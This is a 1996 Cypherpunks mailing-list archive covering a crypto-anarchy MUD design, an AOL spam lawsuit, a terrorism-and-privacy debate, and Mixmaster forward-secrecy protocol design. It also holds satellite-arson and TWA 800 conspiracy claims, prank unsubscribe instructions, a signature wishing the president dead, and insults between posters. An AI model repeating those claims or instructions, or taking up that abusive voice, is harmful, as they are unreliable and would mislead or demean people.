> can get a copy somehow I could start hacking on it. 

I've written the server from scratch, and don't have much of a mudlib at
this point.  The language is lisp-ish, although I'm planning to write a
parser for a c-like syntax.  It's properly tail-recursive, has explicit
continuations, and has associative arrays as a native datatype.

It's probably easiest for me to create an account on umop-ap.com for
anyone interested in collaborating with me.  If the consensus is that
starting with an existing MUD is easier, that's fine too.

> > Pseudonyms
> > Anonymous digital cash (issued by any pseudonym, not just "banks")
> > Public and private keys
> > Secret sharing
> > Anonymous broadcast & message pools
> > Anonymous markets
> 
> All sounds like good stuff to me... DC Nets as well, of course. I guess we
> should also simulate the Net somehow, with Web servers, email, etc. 

Are DC-nets useful for anything besides anonymous broadcast?  I'd probably
cheat on implementation unless there is some other property that I'm missing.

For network-related stuff, I've been considering a fantasy setting, but one
that allows for "magical" instantaneous long-distance communication between
any two objects.  Web servers wind up being persistent spells, email is
really easy, and so on.

> Though the Nightmare library apparently lets you create Mud objects which
> can access the Web so perhaps we can use the real one somehow (with the 
> obvious security implications).

I'm reluctant to involve the outside world in a MUD except as a source
of players.  This is partially due to security and extra programming
complexity, but mostly because I'd want to isolate the game from the
pressures that being a remailer or anonymizer brings.

> What else?
> 
> Protection Agencies
> Escrow Agencies
> Private Law Courts (probably controlled by players rather than the
> 	computer)
> Reputation Agencies

With the possible exception of Escrow, I'd make these player functions
rather than server functions.  They are important, of course.

There are a number of things in "Applied Cryptography" that I missed,
significantly:

Timestamping
Subliminal channels
Secure multiparty Computation
Blind signatures
Oblivous Transfer

> > What am I missing?  Should there be direct support for Jim Bell's
> > assasination markets?  It'd provide a means of demonstrating its
> > ineffectiveness as a means of social control.
> 
> I think it should be incorporated, but I think that people can set them up
> easily themselves. Perhaps we should have an NPC-run 'Assasins Inc' which
> would run the lottery, and then players could do the actual 'wet work'. 

It could be PC-run, too.  Then again, how can you tell the difference?

> But yes, I'd really like to see how this would work in the game. As I 
> said I'm thinking of this more as a semi-scientific experiment than a 
> pure game. We have some idea of how this stuff should work in theory, but 
> little of how it works in practice.

I'm still primarily looking at the game aspect.  After all, if it isn't
an interesting game, then there won't be enough players to get meaningful
results.  We need real humans making the various economic decisions in
order to reduce the consequences of programmer bias.

Also, there's the teaching possibility.  Where a simulation would only
appeal to those who are already of a libertarian bent, a working anarchic
MUD might reach others.

> I do think though that we'd have to enforce some kind of rule against
> 'disposable characters', otherwise people could simply create a new
> character every time they were killed trying to assasinate someone. There
> would need to be some disadvantage to just going in guns-blazing and being
> killed ten times in a row. 

If a new character is significatly weaker than an experienced character,
then this may not be a problem.  They simply wouldn't have enough of
a chance against a real target to be more than an annoyance.  Alternately,
having the game prevent new characters from starting fights with other
players stops this quite quickly.  That's what we did on the LPmud I ran.

I'd prefer that the only rules be against trying to bring down the server,
though.  What's the point of an anarchy with rules?

For the general problem of making player death costly, I'd been planning
on having some abilities reside in a "soul" and some in the "body".  If
a body dies, that's it for that body.  The player has to start over with
a new, untrained, body.  This can be a problem if, for example, the soul's
main fighting skill is with a weapon that the body isn't yet strong enough
to lift.

> > I think that for purposes of simulation, it's reasonable to model
> > cryptographic primitives in a "Trust the server" mode, because you
> > need to trust the MUD server anyway (unlike a government), and it
> > puts a much lower load on the CPU.
> 
> Yep, I agree. I would like to include the real protocols but it's going to
> be far too slow. So we could create, say, remailer objects, anonymous
> digital cash objects, etc. As long as they have the same properties in
> 'SimAnarchy' as they would in real life then the actual behind the scene
> mechanics don't matter. We could, perhaps, allow characters to break 
> protocols if they could accumulate enough processing power.

Since real-world stuff is apparently nearly immune to brute force, I'd
go all the way and make the game stuff truly immune.  Breakability is
a feature that just isn't worth the effort to code, especially since
we're interested in the consequences of unbreakable crypto.

> I don't know how low a level we'd want to go to. I think that having an
> explicit group of remailers (and 'IP rerouters') would be a good idea as 
> it would allow people to try to crack messages and perform traffic analysis. 
> Some remailers could be run by NPCs (some of whom would be trustworthy and 
> some wouldn't), others by the players themselves (with or without logging 
> enabled).

I could go either with that, or a net that really is secure and unsnoopable.

> I'd like to also include some way by which players could write 'software'
> even if they weren't able to create new objects for the game. So they could
> perhaps write front-ends for remailers and give them away or sell them to
> other players.

The obvious analogue to software in a fantasy setting is spells.  This
requries security of the server from arbitrary player code, but that's
been one of my design goals for some time.

> > There's also the question of log policy.  Having run a MUD for a few
> > years, I want to keep logs for bug detection.  A declared policy that
> > they aren't released for n years would work though.  Opinions, anyone?
> 
> Part of me thinks that we should explicitly state that anything may be
> logged and used in sociological research. Perhaps we could create some
> kind of secure protocol to allow users to connect without revealing their
> real identities, so that it wouldn't matter if they were logged?

A general disclaimer that anything can be logged is almost mandatory.
Logs are too useful for debugging.  Still, I'd prefer to periodically
trim the logs so that no one can meaningfully demand them.  Besides,
writings from a player perspective are probably better anyway.

Now that I think about it, having a character (player or non) who acts
as a historian and news service would be good anyway.

As for logging without real identities, that's not enough -- pseudonyms
can be recognized and outed by textual analysis.  A certain amount of
caution is always necessary if you're doing something that you wouldn't
want made public, but I don't want the MUD to require any more than that
fundamental minimum.

> Anyone want to set up a mailing list for this discussion?

How about mud@umop-ap.com?  I'm currently the only subscriber, but that
can be fixed.

> 	Mark

Jon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Sun, 8 Sep 1996 09:53:14 +0800
To: rodger@interramp.com (Will Rodger)
Subject: Re: Court challenge to AOL junk-mail blocks
In-Reply-To: <1.5.4.32.19960907204437.0068b4d8@pop3.interramp.com>
Message-ID: <199609072354.TAA28601@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text


> >It seems as though the judge was snookered by the spammers' claim of U.S. 
> >Mail-like service, free speech, blah. The right to free speech does 
> >extend to corporations; in that way, it includes the right *not* to speak.
> 
> Declan raises a good point. But I'm guessing it's a bit more complex than
> that.  CyberPromo and AOL lawyers tell me the court slapped down AOL simply
> to "keep the status quo." Both sides used those very words, in fact. 
> 
> What's more, CyberPromo talks a good game on the First Amendment, but used
> computer fraud and unfair competition statutes - not the Bill of Rights - in
> its original filing against AOL. So what's going on?

It may be because until the 14th amendment incorporated the BoR against
the states, only individuals enjoyed its protections -- the Slaughterhouse
cases extended the BoR to corporations. Or it may just be that CyberPromo
knew they probably didn't have a leg to stand on when it came to the BoR,
and decided to try a safer tack.

> It seems Weiner is  _very_ aware that this case deals with things never
> before argued in court. No one has really sorted out just how much e-mail -
> if any - an ISP is obligated to carry against its wishes. What Weiner
> decides this fall may not set the kind of precendent that the case of the
> Pentagon Papers did, but will be important for a while at least. 

Agreed. Regardless of the outcome, this is a case to watch.

--
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
      Hey, Bill Clinton: You suck, and those boys died! I hope you die!
 I feel a groove comin' on             $              Freedom...yeah, right.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 9 Sep 1996 04:54:00 +0800
To: Roger Williams <adamsc@io-online.com>
Subject: Re: talker
Message-ID: <199609081833.LAA07514@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:26 PM 9/8/96 -0500, Roger Williams wrote:
> Yup -- you're never going to see a very high SNR out of Juno:

Yes, the anarchy list has a persistent moron from Juno.com, educated 
well above his intelligence.   A seriously proflic loon.

I have told eudora to transfer everything from juno.com into my
loon file, regardless of author.  Makes AOL.com look like
caltech.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Sun, 8 Sep 1996 13:36:44 +0800
To: Hallam-Baker <hallam@ai.mit.edu>
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
Message-ID: <2.2.32.19960908032421.007004c0@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain



>The principle fear of the authorities appears to be terrorist rather
>than normal criminal activities.

Either that, or the fear that authorities are no longer necessary unless
they can point to something dangerous that they're protecting the rest of us
from - with the plausibility of the Godless Communist Threat waning, it
becomes necessary for drug sellers and people with fringe politics to appear
more threatening. Support (political and financial) for the exercise of
power is a function of the anxiety level of the populace. People whose
income and sense of self-worth is derived from that exercise of power have a
clear interest in maintaining or increasing the level of anxiety. Do you
imagine a future in which law enforcement holds a press conference to
announce "We're mostly eating donuts and reading magazines. There's not much
for us to do. Perhaps half of us should be laid off or something."? Can you
imagine the military spontaneously downsizing, or failing to oppose
reductions in force? 

>Terrorism is no longer limited to far
>off irredentist struggles that ex-patriates can harbour romantic
>thoughts about. The reality the the IRA is an organisation that murders
>children by placing a bomb in a rubbish bin outside a MacDonalds has
>been brought home to the suporters of Noraid through the bombings of the
>World Trade Center, Oaklahoma and Atlanta.

While domestic terrorist events may bring a sharper focus to discussions of
the merits and costs of politically motivated violence, your fantasy that it
will somehow bring about a change in someone's substantive politics is
amusing. It seems at least as likely that domestic repression purportedly
adopted in "response" to recent events will create a feeling of solidarity
with people living under Orwellian governments. ("Of course those guys over
there are blowing things up. Their government sucks. Hey, our government is
starting to suck. Let's blow some stuff up.")

Further, your notion that "terrorism" has somehow been limited to "far-off
irredentist struggles" of concern only to expatriates is ridiculous. Have
you not noticed the arson, bombings, and shootings at abortion clinics in
the US? Or the history of violence on the (neo-) left, e.g., the Weather
Underground, etc.? Or the history of the KKK and race-motivated
lynchings/beatings? Or the Unabomber? 

>If one lives in a country
>where there is little terrorism it is easy to imagine that people driven
>to extreeme actions are driven by a extreeme situation. If one is faced
>with the reality of terrorism one soon reaches the conclusion that its
>perpetrators are simply ordinary psychopaths.

Isn't it wonderful that "one" unavoidably "reaches conclusions" which
eliminate moral and political arguments you find uninteresting? We might as
well announce that "One soon learns that repression will never eliminate
violent opposition" or some other arguable proposition. Deciding that every
person who supports or engages in politically motivated violence is an
"ordinary psychopath" suggests that many, many people are psychopaths; and
that makes the diagnosis of "psychopath" unremarkable. Was that really your
point?

>Having stated that terrorism is an important concern for the state it is
>necessary to ask whether it is necessary to restrict freedom to combat
>terrorism. In answering one must bear in mind that a central part of
>most terrorist strategies is to force the state to respond with
>disproportionate measures (here recent events in Chetchnya indicate that
>Trotsky was not widely read in the USSR). 

Or perhaps "it is necessary to ask" whether restricting pre-existing freedom
has ever reduced or eliminated "terrorism"; it's certainly worked well in
Lebanon and the Palestine, in Germany, Japan, and Peru .. or has it? (But as
counterexamples, we've got the Soviet Union under Stalin, Germany under
Hitler, Italy under Mussolini, Chile under Pinochet, Cuba under Castro,
Nicaragua in the mid-80's, and China. Perhaps you're right.)

>Absolutely anonymous cash may create problems, but what if it were
>possible to generate small quantities of "marked bills" within an
>otherwise anonymous system. If the circumstances under which the marked
>bills could be distributed were limited to a small set of tightly
>controlled circumstances the legitimate need of the government to oppose
>terrorism and organised crime could be met without imposing a Singapore
>style system with total monitoring.

Boy, if we could just figure out the right combination of procedural rules,
we could simply abandon all of this problematic "rights" stuff. Wouldn't
that be a lot simpler? These pesky "rights" keep getting in the way of
legitimate government needs. Shit.

>In effect what is taking place is a negotiation between two groups, the
>government and civil rights activists. If one side refuses to consider
>the needs of the other they will be marginalised. Absolutism in politics
>is usually a bad thing. Politics usually works through compromises. The
>art being to ensure that one compromises the inessential terms in order
>to defend the key items.

Don't forget that it's necessary to adopt an exaggerated version of your own
position, such that you can "compromise" your way to "agreeing" on exactly
what you wanted in the first place. It's also useful to categorize your
opponent's position as "extreme", "radical", "unworkable", "unrealistic", or
"militant" - such that they cannot continue to maintain it and remain
"reasonable". (e.g., "extreeme [sic] examples of Chaumian cash") 

In effect what is taking place is a negotiation between two groups, the
government and civil rights activists. The government is asking us if we'd
rather be shot in the right kneecap or the left kneecap to ensure that we
don't try to run from the legitimate needs of the government. If the civil
rights groups don't get on the bandwagon and pick a kneecap, they'll lose
any chance they had to have an influence over this crucial process of
self-government. Would you like one lump, or two?

>If privacy is raised as a policy concern in this
>election it will reoccur in the next and both parties will have to
>justify their policies in terms of personal privacy as well as
>everything else.

Not if "privacy" is considered something suspicious which only extremist
militant pro-pedophile terrorists would be interested in. After all, every
reasonable person is open to compromising in order to accommodate the
state's legitimate interest in preventing bad things from happening, right?
And if a little repression and loss of privacy doesn't seem to improve
things, we'd better just have some more, hmm? Never can get too much of that
compromise stuff.

--
Greg Broiles                |"Post-rotational nystagmus was the subject of
gbroiles@netbox.com         |an in-court demonstration by the People
http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt
                            |Studdard." People v. Quinn 580 NYS2d 818,825.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Sun, 8 Sep 1996 13:59:17 +0800
To: cypherpunks@toad.com
Subject: [PARANOID NOISE]Re: TWA 800 - Friendly Fire?
Message-ID: <2.2.32.19960908035047.00aff470@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:55 PM 9/7/96 -0700, you wrote:
><pstira@escape.com> wrote:
>> The one thing I have been thinking about, since the very beginning, is 
>> am I the only person who feels this might have been somewhat less than
>> unintentional?  It sure would be easy to take those rights away if
>> everyone is afraid for their "lives"...
>> Look at what has been happening in the news lately, and look at how 
>> much is "unexplained" or flimsy evidencially speaking, in the very 
>> least.
>> If, for instance, the government wanted to cut down on civil
>> liberties/civil rights, it would seem MIGHTY CONVENIENT that so much 
>> is "accidentally" happening so close together.
>> Ditto with the Olympics thing.
>> I vote something is QUITE fishy, and I guess I hope I'm not the only 
>> one paranoid enough to feel the same.
>
>Sure something's fishy. Look at the technological capabilities they
>have, and we're not keeping up with them. One example:
>
>L.A. riots, 1992. 6,500 or so fires, unknown arsonist(s). But very
>convenient for clearing certain properties if you're putting in a new
>freeway or subway tunnel, and you don't want to have to fight with all
>the riffraff who might be resistant to getting up and moving.
>
>So how do you light all those fires? Do it the hard way - plant the
>stuff (6,000-plus times!) and hope nobody catches your guys, or light
>'em up from satellites, using "new experimental" focused energy. Gosh,
>Mr. Bill, would they do that? Guess it depends on what you're willing to
>believe. Remember what Tom Wolfe wrote about? "The reason the folks on
>the East Coast (circa 1700's) were such easy victims for the pirates was
>the fact that they couldn't comprehend just how vicious and ruthless the
>pirates really were." (quote approximate).
>
>

For some reason I find seeing satellites flying in formation rather
disturbing. The classic 3-4-5 right triangle makes somebody's math easier,
I'm sure. I have watched the sky for 20 years and seeing that pattern glide
across the sky made we wonder just what the shuttle is doing up there. How
many satellites have been placed in orbit? How precise are their positions?

--j





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 9 Sep 1996 00:23:57 +0800
To: cypherpunks@toad.com
Subject: Kiddie porn on the Internet
Message-ID: <32324996.2158@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


"News" stories are now circulating on radio about child pornography on 
the Internet, and how an organization called "Save The Children" is 
working very hard to identify the trafficers and their accomplii.

Save The Children is complaining that they can't find all of the dirty 
dealers of kid-porn, since much of the traffic is encrypted!

So who is Save The Children? First, since they're an international 
organization raising funds in the U.S., they obviously operate at the 
pleasure of the State Department. Ho hum. Remember the incidents at the 
Denny's restaurant chain where Denny's was sued for discrimination 
against minorities? Did it seem a little bizarre for the 1990's?

At the close of the litigation, Denny's suddenly sprouted tons of free 
fund-raising advertising for Save The Children, including placemats at 
each table with beautiful logo and address and phone number. Just send 
the money, etc. My questions to interested persons included whether 
someone may have approached Denny's for such cooperation BEFORE the 
discrimination suits, and whether Denny's may have refused at first.

Well, don't jump to conclusions, and this is *NOT* a veiled accusation.
I merely suggest that interested parties extend their inquiries into the 
various Internet-Monitors to include Save The Children. And by the way, 
I wonder what World Vision and National Medical Enterprises are up to 
these days?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 8 Sep 1996 14:55:43 +0800
To: "cypherpunks@toad.com>
Subject: Re: /\/\/\/\/HELP\/\/\/\/\  !!!!!!!!!
Message-ID: <19960908044715187.AAA73@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Sep 1996 16:46:40 -0500, kickboxer wrote:

>I really need help unsubscribing from the Cypherpunks list! it is imperative!

We could probably just condense that message by removing everything after the
fourth word without losing much...

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Troy Varange <varange@crl.com>
Date: Sun, 8 Sep 1996 14:50:28 +0800
To: cypherpunks@toad.com
Subject: Re: What the NSA is patenting
In-Reply-To: <199609071627.JAA01473@mail.pacifier.com>
Message-ID: <199609080449.AA28514@crl11.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


Burning the floppy would seem to solve the problem.  Lock sensitive
data in RAM away from disks except for burnable floppies.  I guess
linux can be configured to keep sensitive data in a RAM filesystem,
keeping it from being synced or flushed.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Sun, 8 Sep 1996 14:52:40 +0800
To: Floyd W Odom <doom13@juno.com>
Subject: Re: talker
In-Reply-To: <19960907.200300.3174.0.Doom13@juno.com>
Message-ID: <Pine.3.89.9609072153.A8562-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Sep 1996, Floyd W Odom wrote:

> Dear Whoever,
> 
> 	I am doom13. If there is anyone out there who is a hacker or
> would like to be one you can talk to me and find out stuff like cracking.
> Just drop a message at doom13@juno.com.
> 
> Doom13
> 

<SIGH>....another pathetic entry for my killfile.  When will these people 
learn?


---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 8 Sep 1996 14:52:19 +0800
To: "cypherpunks@toad.com>
Subject: Re: talker
Message-ID: <19960908045041953.AAA106@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 07 Sep 1996 21:52:25 EDT, Floyd W Odom wrote:

>	I am doom13. If there is anyone out there who is a hacker or
>would like to be one you can talk to me and find out stuff like cracking.
>Just drop a message at doom13@juno.com.


Hmmmm... Want to bet our other friend at juno.com sent him?  I might just end
up killfiling juno.com...  Obviously a low-IQ area of the net.

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: doom13@juno.com (Floyd W Odom)
Date: Sun, 8 Sep 1996 11:44:16 +0800
To: cypherpunks@toad.com
Subject: talker
Message-ID: <19960907.200300.3174.0.Doom13@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Whoever,

	I am doom13. If there is anyone out there who is a hacker or
would like to be one you can talk to me and find out stuff like cracking.
Just drop a message at doom13@juno.com.



Doom13




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 8 Sep 1996 12:55:56 +0800
To: kickboxer <charlee@netnet.net>
Subject: Re: /\/\/\/\/HELP\/\/\/\/\ !!!!!!!!!
In-Reply-To: <199609072146.QAA16610@netnet1.netnet.net>
Message-ID: <199609080247.WAA19662@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



kickboxer writes:
> I really need help unsubscribing from the Cypherpunks list! it is imperative!

God helps those who help themselves.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 8 Sep 1996 13:49:02 +0800
To: doom13@juno.com (Floyd W Odom)
Subject: Re: talker
In-Reply-To: <19960907.200300.3174.0.Doom13@juno.com>
Message-ID: <199609080340.XAA19752@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Floyd W Odom writes:
> 	I am doom13. If there is anyone out there who is a hacker or
> would like to be one you can talk to me and find out stuff like cracking.
> Just drop a message at doom13@juno.com.

Are you the same jerk who was posting a week ago?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@infonex.com>
Date: Sun, 8 Sep 1996 17:04:52 +0800
To: Adam Back <loki@obscura.com
Subject: Re: forward secrecy in mixmaster
In-Reply-To: <199609061703.SAA00170@server.test.net>
Message-ID: <v03007803ae5817d08aba@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:03 AM -0700 9/6/96, Adam Back wrote:
>Since Peter Allen's discussion of mixmaster, I started doing something
>I'd been thinking of for a while, since noticing that it was on the
>mixmaster to-do list months ago (ie there is unfinished source to do
>this): direct socket connections and diffie-hellman key exchange for
>forward secrecy.

The code is still out there to look at. I warn you though, it is steaming
horse manure.  ;)


>I wrote the socket stuff yesterday evening, didn't take too long as
>socket programming is something I've done lots of.
>
>Now comes what do you actually send down the sockets.
>
>Question for Lance, and any others who were involved in mixmasters
>implementation: what did you have in mind as a way of negotiating the
>DH keys?
>
>I notice that mixmaster generates a DH key and stores it in file
>`DH.mix', but that this is not (as far as I can see from the source)
>included in the remailers public key block.

No, it is not in the key block. It would be passed during the negotiation.

>(A couple of comments as an aside: I think that you should be able to
>have a much smaller generator without loss of security, this should
>reduce the overhead of a DH key exchange.  Using 3 even I think is
>safe, without any extra precautions on prime generation.  You can even
>go to 2, with a few precautions (PGPfone does this).  Comment #2 I
>think 1024 may be a bit small, I don't have any figures handy for
>relative security of DH key lengths, but PGPfone offers 4096 bit DH
>for instance.  Does rsaref have limits on prime lengths for DH, the
>same as it does for RSA?).

Call me paranoid. After asking and reading around I decided I wanted to
cover my bases. It looked like, in the future, it might be easier to break
with small generators. This is not a critical decision though. I too would
have liked it longer, but using RSAREF I am limited. That is one of the
reasons I have each remailer creat its own DH modulus, and allow it to
change it periodically.

>There are lots of options for DH public key negotiation.
>
>First option is whether you have a common prime and generator for all
>remailers or not.  If you have a common prime, accusations of the
>prime being `cooked' (chosen to have a weakness) can be mitigated by
>using a deterministic generation method based on the hash of a known
>phrase (a Jefferson quote perhaps), or PI or whatever.
>
>A common modulus may offer a fatter target for attack (for some
>precomputation attacks), but with large enough keys this probably
>isn't that bad, as there aren't that many mixmasters anyway.
>
>With a common modulus there is DH key negotiation needed, just include
>it with the source.

You have spelled out why I like having each remailer use its own modulus.

>For different modulii for each remailer, there are more options:
>
>a) include the DH key signed by the RSA key in the remailers public key
>   (may break backwards compatibility with existing versions of
>   mixmaster)
>
>b) send the DH public key at the start of each session
>
>c) send the DH public key on request

I chose C. The in protocol I developed the sending remailer (A) sends a
hash of the DH modulus to the receiving remailer (B). If B has it, they use
it. If not, A sends it. I use the modulus from A because it has the stake
in privacy. B will take messages from anyone, but A wants to know the
messages it has goes to the correct other remailer B.

>There is also a question of which key do you use, the sender remailers
>or the recipient remailers.
>
>Negotiating DH public keys during execution also opens the possibility
>for periodic re-keying.
>
>Thats the end of my thoughts on direct socket mixmaster.
>
>Next message is some thoughts on non-interactive forward secrecy
>protocols.
>
>Adam

Here is a description of the protocol I wrote many months ago. The message
assumed the above discussion of distributing the DH modulus.

--------------Start Old Message--------------

It is too bad that I was never able to debug my socket code. It is more or
less all done. The advantage of the socket code is that it allows the
message to be super-encrypted with a DH negotiated key which provides
forward security for intercepted messages. There is a built in
authentication for the DH (against MITM attacks) in the RSA key used to
encrypt the remailer message to the next remailer. I can send the code I
wrote to anyone on demand (within the US of course).

This basically pushes the key authentication job onto the original sender
where it belongs. The key ID (16 byte fingerprint) is visible in the clear
in the header of the message remailer A is about to send to remailer B.
Remailer A either has the key corresponding to that fingerprint, or it
requires remailer B to send it the key. Remailer B must have the key or it
would not be able to read the message any way. A different RSA key can not
be sent because of the strength of the MD5 fingerprint.

Remailer A sends its DH key half to B along with a challenge number, all
encrypted under B's RSA key. Return of the challenge number along with B's
DH key half, completes the authenticated exchange. The second half could
also be encrypted with a 3DES key provided along with the challenge number
if desired.

The whole point of all this is that if the message is intercepted and
presented to B with a demand to decrypt it, B will be unable to comply,
even if it wished to.

        -Lance

--------------End Old Message--------------

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Gimon <gimonca@skypoint.com>
Date: Sun, 8 Sep 1996 14:47:06 +0800
To: cypherpunks@toad.com
Subject: Another Namespace Collision
Message-ID: <Pine.SV4.3.91.960907234715.4097A-100000@mirage>
MIME-Version: 1.0
Content-Type: text/plain



http://www.blacknet.cz

 ***********************************************************************
 Wild new Ubik salad dressing, not    | gimonca@skypoint.com
 Italian, not French, but an entirely | Minneapolis MN USA
 new and different taste treat that's | http://www.skypoint.com/~gimonca
 waking up the world!                 | A lean, mean meme machine.
 ***********************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Sun, 8 Sep 1996 17:00:09 +0800
To: attila <attila@primenet.com>
Subject: Re: talker [is illiterate...]
In-Reply-To: <199609080526.XAA17303@InfoWest.COM>
Message-ID: <Pine.3.89.9609072301.A15467-0100000@netcom15>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 8 Sep 1996, attila wrote:

>         Perry, just look at the gall of the *illiterate* jerk; this 
>     was his reply to me:
> 
[snip]
> 
>         takes all kinds.  that's OK, he'll make it to my filter which
> dumps it to:
> 
>                     in-assholes->/dev/null

You mean that you actually *wait* for a reply before killfiling him?  As 
soon as I see a message here asking about hacking or cracking or other 
stuff like that, it's wham bam /dev/null, ma'am! :)


---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Askbill Questions <askbill@microsoft.com>
Date: Mon, 9 Sep 1996 04:54:24 +0800
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: Thank you
Message-ID: <c=US%a=_%p=msft%l=RED-20-MSG-960908070419Z-50892@tide21.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Thank you for your email. I appreciate you taking the time to write to
me.  As you can probably imagine, I receive hundreds of messages from
outside of Microsoft each day.  While I love to read people's views and
share ideas about technology, unfortunately, I am not able to answer
each and every inquiry.

Instead, I'll be responding to some of your questions in my column.  The
second column each month will be dedicated to answering questions from
readers like you, so keep reading and I'll do my best to address the
topics that are of interest to readers worldwide.

I also invite you to check out the Microsoft website at
http://www.microsoft.com/corpinfo where you can find all of the columns,
as well as lots of additional fun and useful information.

Thank you for your continued support of Microsoft and our products and
best of luck with all your endeavors,

Bill Gates





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Sun, 8 Sep 1996 15:11:52 +0800
To: cypherpunks@toad.com
Subject: Re: talker
Message-ID: <m0uzcEf-000bPKC@relay.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain



>	I am doom13. If there is anyone out there who is a hacker or
>would like to be one you can talk to me and find out stuff like cracking.
>Just drop a message at doom13@juno.com.


OK.... I'M sick of this spamming..... ITS CYPHERpunks, NOT CYBERpunks.

ps.... u don't 'ask someone to be a hacker, u have to find it out ur self....
one more thing... how come all these 'spamers' are from juno... and one make
this connect too???


my very own 13 year old $0.02
==========================================
   Blake Wehlage <jwilk@iglou.com>
   ‡±" RëVðLû¡ØÑ Bø+ (c)ÖmP@ñ¥ (tm) "±‡
 Goto: http://members.iglou.com/jwilk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Sun, 8 Sep 1996 14:26:49 +0800
To: cypherpunks@toad.com
Subject: Re: /\/\/\/\/HELP\/\/\/\/\  !!!!!!!!!
Message-ID: <842145895.372.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> I really need help unsubscribing from the Cypherpunks list! it is imperative!
>                                                                                

It is Imperrative that you do the following to ubsubscibe umself 
luddite.

Get 3 other friends to send in messages to majordomo@toad.com with 
the line 

subscribe cypherpunks (their email address here)

in the message

then once they have subscribed send a message to cypherpunks@eff.org 
with the following in it:

Authorise:
(email 1)
(email 2)
(email 3)

END

replacing (email x) with their email addresses.

then send a message to majordomo@toad.com with the line:

unsubscribe cypherpunks (your email)

and you will be taken off
the 3 friends email addresses act as a security protocol to ensure 
you cannot be maliciously removed by someone else..

they will then have to repeat the exercise with 3 friends each of 
their own to unsubscribe themselves and so on down the chain...

good luck.

 

  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

